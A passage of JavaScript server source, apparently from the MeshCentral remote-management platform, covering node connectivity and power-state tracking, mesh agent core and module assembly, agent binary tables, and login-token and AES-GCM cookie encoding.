if ((state.connectivity & connectType) == 0) { state.connectivity |= connectType; eventConnectChange = 1; }
state.meshid = meshid;
} else {
// Add the connection to the node and mesh state list
obj.connectivityByNode[nodeid] = state = { connectivity: connectType, meshid: meshid };
eventConnectChange = 1;
}
// Set node power state
if (connectType == 1) { state.agentPower = powerState; } else if (connectType == 2) { state.ciraPower = powerState; } else if (connectType == 4) { state.amtPower = powerState; }
var powerState = 0, oldPowerState = state.powerState;
if ((state.connectivity & 1) != 0) { powerState = state.agentPower; } else if ((state.connectivity & 2) != 0) { powerState = state.ciraPower; } else if ((state.connectivity & 4) != 0) { powerState = state.amtPower; }
if ((state.powerState == null) || (state.powerState != powerState)) {
state.powerState = powerState;
eventConnectChange = 1;
// Set new power state in database
var record = { time: new Date(connectTime), nodeid: nodeid, power: powerState };
if (oldPowerState != null) { record.oldPower = oldPowerState; }
obj.db.storePowerEvent(record, obj.multiServer);
}
// Event the node connection change
if (eventConnectChange == 1) {
obj.DispatchEvent(obj.webserver.CreateNodeDispatchTargets(meshid, nodeid), obj, { action: 'nodeconnect', meshid: meshid, nodeid: nodeid, domain: nodeid.split('/')[1], conn: state.connectivity, pwr: state.powerState, ct: connectTime, nolog: 1, nopeers: 1 });
}
} else {
// Multi server mode
// Change the node connection state
if (serverid == null) { serverid = obj.serverId; }
if (obj.peerConnectivityByNode[serverid] == null) return; // Guard against unknown serverid's
var state = obj.peerConnectivityByNode[serverid][nodeid];
if (state) {
// Change the connection in the node and mesh state lists
if ((state.connectivity & connectType) == 0) { state.connectivity |= connectType; }
state.meshid = meshid;
} else {
// Add the connection to the node and mesh state list
obj.peerConnectivityByNode[serverid][nodeid] = state = { connectivity: connectType, meshid: meshid };
}
// Set node power state
if (connectType == 1) { state.agentPower = powerState; } else if (connectType == 2) { state.ciraPower = powerState; } else if (connectType == 4) { state.amtPower = powerState; }
var powerState = 0, oldPowerState = state.powerState;
if ((state.connectivity & 1) != 0) { powerState = state.agentPower; } else if ((state.connectivity & 2) != 0) { powerState = state.ciraPower; } else if ((state.connectivity & 4) != 0) { powerState = state.amtPower; }
if ((state.powerState == null) || (state.powerState != powerState)) {
state.powerState = powerState;
// Set new power state in database
var record = { time: new Date(connectTime), nodeid: nodeid, power: powerState, server: obj.multiServer.serverid };
if (oldPowerState != null) { record.oldPower = oldPowerState; }
obj.db.storePowerEvent(record, obj.multiServer);
}
// Update the combined node state
var x = {}; x[nodeid] = 1;
obj.UpdateConnectivityState(x);
}
};
// Clear the connectivity state of a node and setup the server so that messages can be routed correctly.
// meshId: mesh identifier of format mesh/domain/meshidhex
// nodeId: node identifier of format node/domain/nodeidhex
// connectType: Bitmask, 1 = MeshAgent, 2 = Intel AMT CIRA, 3 = Intel AMT local.
obj.ClearConnectivityState = function (meshid, nodeid, connectType, serverid) {
//console.log('ClearConnectivity for ' + nodeid.substring(0, 16) + ', Type: ' + connectTypeStrings[connectType] + (serverid == null?(''):(', ServerId: ' + serverid)));
if ((serverid == null) && (obj.multiServer != null)) { obj.multiServer.DispatchMessage({ action: 'ClearConnectivityState', meshid: meshid, nodeid: nodeid, connectType: connectType }); }
if (obj.multiServer == null) {
// Single server mode
var eventConnectChange = 0;
// Remove the agent connection from the nodes connection list
var state = obj.connectivityByNode[nodeid];
if (state == null) return;
if ((state.connectivity & connectType) != 0) {
state.connectivity -= connectType;
// If the node is completely disconnected, clean it up completely
if (state.connectivity == 0) { delete obj.connectivityByNode[nodeid]; }
eventConnectChange = 1;
}
// Clear node power state
var oldPowerState = state.powerState, powerState = 0;
if (connectType == 1) { state.agentPower = 0; } else if (connectType == 2) { state.ciraPower = 0; } else if (connectType == 4) { state.amtPower = 0; }
if ((state.connectivity & 1) != 0) { powerState = state.agentPower; } else if ((state.connectivity & 2) != 0) { powerState = state.ciraPower; } else if ((state.connectivity & 4) != 0) { powerState = state.amtPower; }
if ((state.powerState == null) || (state.powerState != powerState)) {
state.powerState = powerState;
eventConnectChange = 1;
// Set new power state in database
obj.db.storePowerEvent({ time: new Date(), nodeid: nodeid, power: powerState, oldPower: oldPowerState }, obj.multiServer);
}
// Event the node connection change
if (eventConnectChange == 1) { obj.DispatchEvent(obj.webserver.CreateNodeDispatchTargets(meshid, nodeid), obj, { action: 'nodeconnect', meshid: meshid, nodeid: nodeid, domain: nodeid.split('/')[1], conn: state.connectivity, pwr: state.powerState, nolog: 1, nopeers: 1 }); }
} else {
// Multi server mode
// Remove the agent connection from the nodes connection list
if (serverid == null) { serverid = obj.serverId; }
if (obj.peerConnectivityByNode[serverid] == null) return; // Guard against unknown serverid's
var state = obj.peerConnectivityByNode[serverid][nodeid];
if (state == null) return;
// If existing state exist, remove this connection
if ((state.connectivity & connectType) != 0) {
state.connectivity -= connectType; // Remove one connectivity mode
// If the node is completely disconnected, clean it up completely
if (state.connectivity == 0) { delete obj.peerConnectivityByNode[serverid][nodeid]; state.powerState = 0; }
}
// Clear node power state
if (connectType == 1) { state.agentPower = 0; } else if (connectType == 2) { state.ciraPower = 0; } else if (connectType == 4) { state.amtPower = 0; }
var powerState = 0;
if ((state.connectivity & 1) != 0) { powerState = state.agentPower; } else if ((state.connectivity & 2) != 0) { powerState = state.ciraPower; } else if ((state.connectivity & 4) != 0) { powerState = state.amtPower; }
if ((state.powerState == null) || (state.powerState != powerState)) { state.powerState = powerState; }
// Update the combined node state
var x = {}; x[nodeid] = 1;
obj.UpdateConnectivityState(x);
}
};
// Escape a code string
obj.escapeCodeString = function (str) {
const escapeCodeStringTable = { '\'': '\\\'', '\"': '\\"', '\\': '\\\\', '\b': '\\b', '\f': '\\f', '\n': '\\n', '\r': '\\r', '\t': '\\t' };
var r = '', c, cr, table;
for (var i = 0; i < str.length; i++) {
c = str[i];
table = escapeCodeStringTable[c];
if (table != null) {
r += table;
} else {
cr = c.charCodeAt(0);
if ((cr >= 32) && (cr <= 127)) { r += c; }
}
}
return r;
}
// Update the default mesh core
obj.updateMeshCore = function (func) {
// Figure out where meshcore.js is
var meshcorePath = obj.datapath;
if (obj.fs.existsSync(obj.path.join(meshcorePath, 'meshcore.js')) == false) {
meshcorePath = obj.path.join(__dirname, 'agents');
if (obj.fs.existsSync(obj.path.join(meshcorePath, 'meshcore.js')) == false) {
obj.defaultMeshCores = obj.defaultMeshCoresHash = { }; if (func != null) { func(false); } // meshcore.js not found
}
}
// Read meshcore.js and all .js files in the modules folder.
var meshCore = null, modulesDir = null;
const modulesAdd = {
'windows-amt': ['var addedModules = [];\r\n'],
'linux-amt': ['var addedModules = [];\r\n'],
'linux-noamt': ['var addedModules = [];\r\n']
};
// Read the recovery core if present
var meshRecoveryCore = null;
if (obj.fs.existsSync(obj.path.join(__dirname, 'agents', 'recoverycore.js')) == true) {
try { meshRecoveryCore = obj.fs.readFileSync(obj.path.join(__dirname, 'agents', 'recoverycore.js')).toString(); } catch (ex) { }
if (meshRecoveryCore != null) {
modulesAdd['windows-recovery'] = ['var addedModules = [];\r\n'];
modulesAdd['linux-recovery'] = ['var addedModules = [];\r\n'];
}
}
// Read the agent recovery core if present
var meshAgentRecoveryCore = null;
if (obj.fs.existsSync(obj.path.join(__dirname, 'agents', 'meshcore_diagnostic.js')) == true) {
try { meshAgentRecoveryCore = obj.fs.readFileSync(obj.path.join(__dirname, 'agents', 'meshcore_diagnostic.js')).toString(); } catch (ex) { }
if (meshAgentRecoveryCore != null) {
modulesAdd['windows-agentrecovery'] = ['var addedModules = [];\r\n'];
modulesAdd['linux-agentrecovery'] = ['var addedModules = [];\r\n'];
}
}
if (obj.args.minifycore !== false) { try { meshCore = obj.fs.readFileSync(obj.path.join(meshcorePath, 'meshcore.min.js')).toString(); } catch (e) { } } // Favor minified meshcore if present.
if (meshCore == null) { try { meshCore = obj.fs.readFileSync(obj.path.join(meshcorePath, 'meshcore.js')).toString(); } catch (e) { } } // Use non-minified meshcore.
if (meshCore != null) {
var moduleDirPath = null;
if (obj.args.minifycore !== false) { try { moduleDirPath = obj.path.join(meshcorePath, 'modules_meshcore_min'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Favor minified modules if present.
if (modulesDir == null) { try { moduleDirPath = obj.path.join(meshcorePath, 'modules_meshcore'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Use non-minified mofules.
if (modulesDir != null) {
for (var i in modulesDir) {
if (modulesDir[i].toLowerCase().endsWith('.js')) {
var moduleName = modulesDir[i].substring(0, modulesDir[i].length - 3);
if (moduleName.endsWith('.min')) { moduleName = moduleName.substring(0, moduleName.length - 4); } // Remove the ".min" for ".min.js" files.
var moduleData = [ 'try { addModule("', moduleName, '", "', obj.escapeCodeString(obj.fs.readFileSync(obj.path.join(moduleDirPath, modulesDir[i])).toString('binary')), '"); addedModules.push("', moduleName, '"); } catch (e) { }\r\n' ];
// Merge this module
// NOTE: "smbios" module makes some non-AI Linux segfault, only include for IA platforms.
if (moduleName.startsWith('amt-') || (moduleName == 'smbios')) {
// Add to IA / Intel AMT cores only
modulesAdd['windows-amt'].push(...moduleData);
modulesAdd['linux-amt'].push(...moduleData);
} else if (moduleName.startsWith('win-')) {
// Add to Windows cores only
modulesAdd['windows-amt'].push(...moduleData);
} else if (moduleName.startsWith('linux-')) {
// Add to Linux cores only
modulesAdd['linux-amt'].push(...moduleData);
modulesAdd['linux-noamt'].push(...moduleData);
} else {
// Add to all cores
modulesAdd['windows-amt'].push(...moduleData);
modulesAdd['linux-amt'].push(...moduleData);
modulesAdd['linux-noamt'].push(...moduleData);
}
// Merge this module to recovery modules if needed
if (modulesAdd['windows-recovery'] != null) {
if ((moduleName == 'win-console') || (moduleName == 'win-message-pump') || (moduleName == 'win-terminal')) {
modulesAdd['windows-recovery'].push(...moduleData);
}
}
// Merge this module to agent recovery modules if needed
if (modulesAdd['windows-agentrecovery'] != null) {
if ((moduleName == 'win-console') || (moduleName == 'win-message-pump') || (moduleName == 'win-terminal')) {
modulesAdd['windows-agentrecovery'].push(...moduleData);
}
}
}
}
}
// Add plugins to cores
if (obj.pluginHandler) { obj.pluginHandler.addMeshCoreModules(modulesAdd); }
// Merge the cores and compute the hashes
for (var i in modulesAdd) {
if ((i == 'windows-recovery') || (i == 'linux-recovery')) {
obj.defaultMeshCores[i] = [obj.common.IntToStr(0), ...modulesAdd[i], meshRecoveryCore].join('');
} else if ((i == 'windows-agentrecovery') || (i == 'linux-agentrecovery')) {
obj.defaultMeshCores[i] = [obj.common.IntToStr(0), ...modulesAdd[i], meshAgentRecoveryCore].join('');
} else {
obj.defaultMeshCores[i] = [obj.common.IntToStr(0), ...modulesAdd[i], meshCore].join('');
}
obj.defaultMeshCoresHash[i] = obj.crypto.createHash('sha384').update(obj.defaultMeshCores[i]).digest("binary");
obj.debug('main', 'Core module ' + i + ' is ' + obj.defaultMeshCores[i].length + ' bytes.');
//console.log('Core module ' + i + ' is ' + obj.defaultMeshCores[i].length + ' bytes.'); // DEBUG, Print the core size
//obj.fs.writeFile("C:\\temp\\" + i + ".js", obj.defaultMeshCores[i].substring(4)); // DEBUG, Write the core to file
}
}
// We are done creating all the mesh cores.
if (func != null) { func(true); }
};
// Update the default meshcmd
obj.updateMeshCmdTimer = 'notset';
obj.updateMeshCmd = function (func) {
// Figure out where meshcmd.js is and read it.
var meshCmd = null, meshcmdPath, moduleAdditions = ['var addedModules = [];\r\n'], moduleDirPath, modulesDir = null;
if ((obj.args.minifycore !== false) && (obj.fs.existsSync(obj.path.join(obj.datapath, 'meshcmd.min.js')))) { meshcmdPath = obj.path.join(obj.datapath, 'meshcmd.min.js'); meshCmd = obj.fs.readFileSync(meshcmdPath).toString(); }
else if (obj.fs.existsSync(obj.path.join(obj.datapath, 'meshcmd.js'))) { meshcmdPath = obj.path.join(obj.datapath, 'meshcmd.js'); meshCmd = obj.fs.readFileSync(meshcmdPath).toString(); }
else if ((obj.args.minifycore !== false) && (obj.fs.existsSync(obj.path.join(__dirname, 'agents', 'meshcmd.min.js')))) { meshcmdPath = obj.path.join(__dirname, 'agents', 'meshcmd.min.js'); meshCmd = obj.fs.readFileSync(meshcmdPath).toString(); }
else if (obj.fs.existsSync(obj.path.join(__dirname, 'agents', 'meshcmd.js'))) { meshcmdPath = obj.path.join(__dirname, 'agents', 'meshcmd.js'); meshCmd = obj.fs.readFileSync(meshcmdPath).toString(); }
else { obj.defaultMeshCmd = null; if (func != null) { func(false); } } // meshcmd.js not found
meshCmd = meshCmd.replace("'***Mesh*Cmd*Version***'", '\'' + getCurrentVerion() + '\'');
// Figure out where the modules_meshcmd folder is.
if (obj.args.minifycore !== false) { try { moduleDirPath = obj.path.join(meshcmdPath, 'modules_meshcmd_min'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Favor minified modules if present.
if (modulesDir == null) { try { moduleDirPath = obj.path.join(meshcmdPath, 'modules_meshcmd'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Use non-minified mofules.
if (obj.args.minifycore !== false) { if (modulesDir == null) { try { moduleDirPath = obj.path.join(__dirname, 'agents', 'modules_meshcmd_min'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } } // Favor minified modules if present.
if (modulesDir == null) { try { moduleDirPath = obj.path.join(__dirname, 'agents', 'modules_meshcmd'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Use non-minified mofules.
// Read all .js files in the meshcmd modules folder.
if (modulesDir != null) {
for (var i in modulesDir) {
if (modulesDir[i].toLowerCase().endsWith('.js')) {
// Merge this module
var moduleName = modulesDir[i].substring(0, modulesDir[i].length - 3);
if (moduleName.endsWith('.min')) { moduleName = moduleName.substring(0, moduleName.length - 4); } // Remove the ".min" for ".min.js" files.
moduleAdditions.push('try { addModule("', moduleName, '", "', obj.escapeCodeString(obj.fs.readFileSync(obj.path.join(moduleDirPath, modulesDir[i])).toString('binary')), '"); addedModules.push("', moduleName, '"); } catch (e) { }\r\n');
}
}
}
// Set the new default meshcmd.js
moduleAdditions.push(meshCmd);
obj.defaultMeshCmd = moduleAdditions.join('');
//console.log('MeshCmd is ' + obj.defaultMeshCmd.length + ' bytes.'); // DEBUG, Print the merged meshcmd.js size
//obj.fs.writeFile("C:\\temp\\meshcmd.js", obj.defaultMeshCmd.substring(4)); // DEBUG, Write merged meshcmd.js to file
if (func != null) { func(true); }
// Monitor for changes in meshcmd.js
if (obj.updateMeshCmdTimer === 'notset') {
obj.updateMeshCmdTimer = null;
obj.fs.watch(meshcmdPath, function (eventType, filename) {
if (obj.updateMeshCmdTimer != null) { clearTimeout(obj.updateMeshCmdTimer); obj.updateMeshCmdTimer = null; }
obj.updateMeshCmdTimer = setTimeout(function () { obj.updateMeshCmd(); }, 5000);
});
}
};
// List of possible mesh agent install scripts
var meshAgentsInstallScriptList = {
1: { id: 1, localname: 'meshinstall-linux.sh', rname: 'meshinstall.sh', linux: true },
2: { id: 2, localname: 'meshinstall-initd.sh', rname: 'meshagent', linux: true },
5: { id: 5, localname: 'meshinstall-bsd-rcd.sh', rname: 'meshagent', linux: true }
};
// Update the list of available mesh agents
obj.updateMeshAgentInstallScripts = function () {
for (var scriptid in meshAgentsInstallScriptList) {
var scriptpath = obj.path.join(__dirname, 'agents', meshAgentsInstallScriptList[scriptid].localname);
var stream = null;
try {
stream = obj.fs.createReadStream(scriptpath);
stream.xdata = '';
stream.on('data', function (data) { this.hash.update(data, 'binary'); this.xdata += data; });
stream.on('error', function (data) {
// If there is an error reading this file, make sure this agent is not in the agent table
if (obj.meshAgentInstallScripts[this.info.id] != null) { delete obj.meshAgentInstallScripts[this.info.id]; }
});
stream.on('end', function () {
// Add the agent to the agent table with all information and the hash
obj.meshAgentInstallScripts[this.info.id] = Object.assign({}, this.info);
obj.meshAgentInstallScripts[this.info.id].hash = this.hash.digest('hex');
obj.meshAgentInstallScripts[this.info.id].path = this.agentpath;
obj.meshAgentInstallScripts[this.info.id].data = this.xdata;
obj.meshAgentInstallScripts[this.info.id].url = ((obj.args.notls == true) ? 'http://' : 'https://') + obj.certificates.CommonName + ':' + ((typeof obj.args.aliasport == 'number') ? obj.args.aliasport : obj.args.port) + '/meshagents?script=' + this.info.id;
var stats = null;
try { stats = obj.fs.statSync(this.agentpath); } catch (e) { }
if (stats != null) { obj.meshAgentInstallScripts[this.info.id].size = stats.size; }
// Place Unit line breaks on Linux scripts if not already present.
if (obj.meshAgentInstallScripts[this.info.id].linux === true) { obj.meshAgentInstallScripts[this.info.id].data = obj.meshAgentInstallScripts[this.info.id].data.split('\r\n').join('\n') }
});
stream.info = meshAgentsInstallScriptList[scriptid];
stream.agentpath = scriptpath;
stream.hash = obj.crypto.createHash('sha384', stream);
} catch (e) { }
}
};
// List of possible mesh agents
obj.meshAgentsArchitectureNumbers = {
0: { id: 0, localname: 'Unknown', rname: 'meshconsole.exe', desc: 'Unknown agent', update: false, amt: true, platform: 'unknown', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
1: { id: 1, localname: 'MeshConsole.exe', rname: 'meshconsole32.exe', desc: 'Windows x86-32 console', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
2: { id: 2, localname: 'MeshConsole64.exe', rname: 'meshconsole64.exe', desc: 'Windows x86-64 console', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
3: { id: 3, localname: 'MeshService-signed.exe', rname: 'meshagent32.exe', desc: 'Windows x86-32 service', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
4: { id: 4, localname: 'MeshService64-signed.exe', rname: 'meshagent64.exe', desc: 'Windows x86-64 service', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
5: { id: 5, localname: 'meshagent_x86', rname: 'meshagent', desc: 'Linux x86-32', update: true, amt: true, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
6: { id: 6, localname: 'meshagent_x86-64', rname: 'meshagent', desc: 'Linux x86-64', update: true, amt: true, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
7: { id: 7, localname: 'meshagent_mips', rname: 'meshagent', desc: 'Linux MIPS', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
8: { id: 8, localname: 'MeshAgent-Linux-XEN-x86-32', rname: 'meshagent', desc: 'XEN x86-64', update: true, amt: false, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
9: { id: 9, localname: 'meshagent_arm', rname: 'meshagent', desc: 'Linux ARM5', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
10: { id: 10, localname: 'MeshAgent-Linux-ARM-PlugPC', rname: 'meshagent', desc: 'Linux ARM PlugPC', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
11: { id: 11, localname: 'meshagent_osx-x86-32', rname: 'meshosx', desc: 'Apple OSX x86-32', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
12: { id: 12, localname: 'MeshAgent-Android-x86', rname: 'meshandroid', desc: 'Android x86-32', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
13: { id: 13, localname: 'meshagent_pogo', rname: 'meshagent', desc: 'Linux ARM PogoPlug', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
14: { id: 14, localname: 'MeshAgent-Android-APK', rname: 'meshandroid', desc: 'Android Market', update: false, amt: false, platform: 'android', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Get this one from Google Play
15: { id: 15, localname: 'meshagent_poky', rname: 'meshagent', desc: 'Linux Poky x86-32', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
16: { id: 16, localname: 'meshagent_osx-x86-64', rname: 'meshagent', desc: 'Apple OSX x86-64', update: true, amt: false, platform: 'osx', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
17: { id: 17, localname: 'MeshAgent-ChromeOS', rname: 'meshagent', desc: 'Google ChromeOS', update: false, amt: false, platform: 'chromeos', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Get this one from Chrome store
18: { id: 18, localname: 'meshagent_poky64', rname: 'meshagent', desc: 'Linux Poky x86-64', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
19: { id: 19, localname: 'meshagent_x86_nokvm', rname: 'meshagent', desc: 'Linux x86-32 NoKVM', update: true, amt: true, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
20: { id: 20, localname: 'meshagent_x86-64_nokvm', rname: 'meshagent', desc: 'Linux x86-64 NoKVM', update: true, amt: true, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
21: { id: 21, localname: 'MeshAgent-WinMinCore-Console-x86-32.exe', rname: 'meshagent.exe', desc: 'Windows MinCore Console x86-32', update: true, amt: false, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
22: { id: 22, localname: 'MeshAgent-WinMinCore-Service-x86-64.exe', rname: 'meshagent.exe', desc: 'Windows MinCore Service x86-32', update: true, amt: false, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
23: { id: 23, localname: 'MeshAgent-NodeJS', rname: 'meshagent', desc: 'NodeJS', update: false, amt: false, platform: 'node', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Get this one from NPM
24: { id: 24, localname: 'meshagent_arm-linaro', rname: 'meshagent', desc: 'Linux ARM Linaro', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
25: { id: 25, localname: 'meshagent_armhf', rname: 'meshagent', desc: 'Linux ARM - HardFloat', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // "armv6l" and "armv7l"
26: { id: 26, localname: 'meshagent_arm64', rname: 'meshagent', desc: 'Linux ARMv8-64', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // "aarch64"
27: { id: 27, localname: 'meshagent_armhf2', rname: 'meshagent', desc: 'Linux ARM - HardFloat', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Raspbian 7 2015-02-02 for old Raspberry Pi.
30: { id: 30, localname: 'meshagent_freebsd_x86-64', rname: 'meshagent', desc: 'FreeBSD x86-64', update: true, amt: false, platform: 'freebsd', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // FreeBSD x64
10003: { id: 3, localname: 'MeshService.exe', rname: 'meshagent.exe', desc: 'Windows x86-32 service', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Unsigned version of the Windows MeshAgent x86
10004: { id: 4, localname: 'MeshService64.exe', rname: 'meshagent.exe', desc: 'Windows x86-64 service', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' } // Unsigned version of the Windows MeshAgent x64
};
// Update the list of available mesh agents
obj.updateMeshAgentsTable = function (func) {
var archcount = 0;
for (var archid in obj.meshAgentsArchitectureNumbers) {
var agentpath = obj.path.join(__dirname, 'agents', obj.meshAgentsArchitectureNumbers[archid].localname);
// Fetch all the agent binary information
var stats = null;
try { stats = obj.fs.statSync(agentpath); } catch (e) { }
if ((stats != null)) {
// If file exists
archcount++;
obj.meshAgentBinaries[archid] = Object.assign({}, obj.meshAgentsArchitectureNumbers[archid]);
obj.meshAgentBinaries[archid].path = agentpath;
obj.meshAgentBinaries[archid].url = ((obj.args.notls == true) ? 'http://' : 'https://') + obj.certificates.CommonName + ':' + ((typeof obj.args.aliasport == 'number') ? obj.args.aliasport : obj.args.port) + '/meshagents?id=' + archid;
obj.meshAgentBinaries[archid].size = stats.size;
// If this is a windows binary, pull binary information
if (obj.meshAgentsArchitectureNumbers[archid].platform == 'win32') {
try { obj.meshAgentBinaries[archid].pe = obj.exeHandler.parseWindowsExecutable(agentpath); } catch (e) { }
}
// If agents must be stored in RAM or if this is a Windows 32/64 agent, load the agent in RAM.
if ((obj.args.agentsinram === true) || (((archid == 3) || (archid == 4)) && (obj.args.agentsinram !== false))) {
if ((archid == 3) || (archid == 4)) {
// Load the agent with a random msh added to it.
var outStream = new require('stream').Duplex();
outStream.meshAgentBinary = obj.meshAgentBinaries[archid];
outStream.meshAgentBinary.randomMsh = Buffer.from(obj.crypto.randomBytes(64), 'binary').toString('base64');
outStream.bufferList = [];
outStream._write = function (chunk, encoding, callback) { this.bufferList.push(chunk); if (callback) callback(); }; // Append the chuck.
outStream._read = function (size) { }; // Do nothing, this is not going to be called.
outStream.on('finish', function () { this.meshAgentBinary.data = Buffer.concat(this.bufferList); this.meshAgentBinary.size = this.meshAgentBinary.data.length; delete this.bufferList; }) // Merge all chunks
obj.exeHandler.streamExeWithMeshPolicy(
{
platform: 'win32',
sourceFileName: agentpath,
destinationStream: outStream,
randomPolicy: true, // Indicates that the msh policy is random data.
msh: outStream.meshAgentBinary.randomMsh,
peinfo: obj.meshAgentBinaries[archid].pe
});
} else {
// Load the agent as-is
obj.meshAgentBinaries[archid].data = obj.fs.readFileSync(agentpath);
}
}
// Hash the binary
var hashStream = obj.crypto.createHash('sha384');
hashStream.archid = archid;
hashStream.on('data', function (data) {
obj.meshAgentBinaries[this.archid].hash = data.toString('binary');
obj.meshAgentBinaries[this.archid].hashhex = data.toString('hex');
if ((--archcount == 0) && (func != null)) { func(); }
});
var options = { sourcePath: agentpath, targetStream: hashStream, platform: obj.meshAgentsArchitectureNumbers[archid].platform };
if (obj.meshAgentBinaries[archid].pe != null) { options.peinfo = obj.meshAgentBinaries[archid].pe; }
obj.exeHandler.hashExecutableFile(options);
}
}
if ((obj.meshAgentBinaries[3] == null) && (obj.meshAgentBinaries[10003] != null)) { obj.meshAgentBinaries[3] = obj.meshAgentBinaries[10003]; } // If only the unsigned windows binaries are present, use them.
if ((obj.meshAgentBinaries[4] == null) && (obj.meshAgentBinaries[10004] != null)) { obj.meshAgentBinaries[4] = obj.meshAgentBinaries[10004]; } // If only the unsigned windows binaries are present, use them.
};
// Generate a time limited user login token
obj.getLoginToken = function (userid, func) {
if ((userid == null) || (typeof userid != 'string')) { func('Invalid userid.'); return; }
var x = userid.split('/');
if (x == null || x.length != 3 || x[0] != 'user') { func('Invalid userid.'); return; }
obj.db.Get(userid, function (err, docs) {
if (err != null || docs == null || docs.length == 0) {
func('User ' + userid + ' not found.'); return;
} else {
// Load the login cookie encryption key from the database
obj.db.Get('LoginCookieEncryptionKey', function (err, docs) {
if ((docs.length > 0) && (docs[0].key != null) && (obj.args.logintokengen == null) && (docs[0].key.length >= 160)) {
// Key is present, use it.
obj.loginCookieEncryptionKey = Buffer.from(docs[0].key, 'hex');
func(obj.encodeCookie({ u: userid, a: 3 }, obj.loginCookieEncryptionKey));
} else {
// Key is not present, generate one.
obj.loginCookieEncryptionKey = obj.generateCookieKey();
obj.db.Set({ _id: 'LoginCookieEncryptionKey', key: obj.loginCookieEncryptionKey.toString('hex'), time: Date.now() }, function () { func(obj.encodeCookie({ u: userid, a: 3 }, obj.loginCookieEncryptionKey)); });
}
});
}
});
};
// Show the user login token generation key
obj.showLoginTokenKey = function (func) {
// Load the login cookie encryption key from the database
obj.db.Get('LoginCookieEncryptionKey', function (err, docs) {
if ((docs.length > 0) && (docs[0].key != null) && (obj.args.logintokengen == null) && (docs[0].key.length >= 160)) {
// Key is present, use it.
func(docs[0].key);
} else {
// Key is not present, generate one.
obj.loginCookieEncryptionKey = obj.generateCookieKey();
obj.db.Set({ _id: 'LoginCookieEncryptionKey', key: obj.loginCookieEncryptionKey.toString('hex'), time: Date.now() }, function () { func(obj.loginCookieEncryptionKey.toString('hex')); });
}
});
};
// Generate a cryptographic key used to encode and decode cookies
obj.generateCookieKey = function () {
return Buffer.from(obj.crypto.randomBytes(80), 'binary');
//return Buffer.alloc(80, 0); // Sets the key to zeros, debug only.
};
// Encode an object as a cookie using a key using AES-GCM. (key must be 32 bytes or more)
obj.encodeCookie = function (o, key) {
try {
if (key == null) { key = obj.serverKey; }
o.time = Math.floor(Date.now() / 1000); // Add the cookie creation time
const iv = Buffer.from(obj.crypto.randomBytes(12), 'binary'), cipher = obj.crypto.createCipheriv('aes-256-gcm', key.slice(0, 32), iv);
const crypted = Buffer.concat([cipher.update(JSON.stringify(o), 'utf8'), cipher.final()]);
var r = Buffer.concat([iv, cipher.getAuthTag(), crypted]).toString(obj.args.cookieencoding ? obj.args.cookieencoding : 'base64').replace(/\+/g, '@').replace(/\//g, '$');
obj.debug('cookie', 'Encoded AESGCM cookie: ' + JSON.stringify(o));
return r;
} catch (ex) { obj.debug('cookie', 'ERR: Failed to encode AESGCM cookie due to exception: ' + ex); return null; }
};
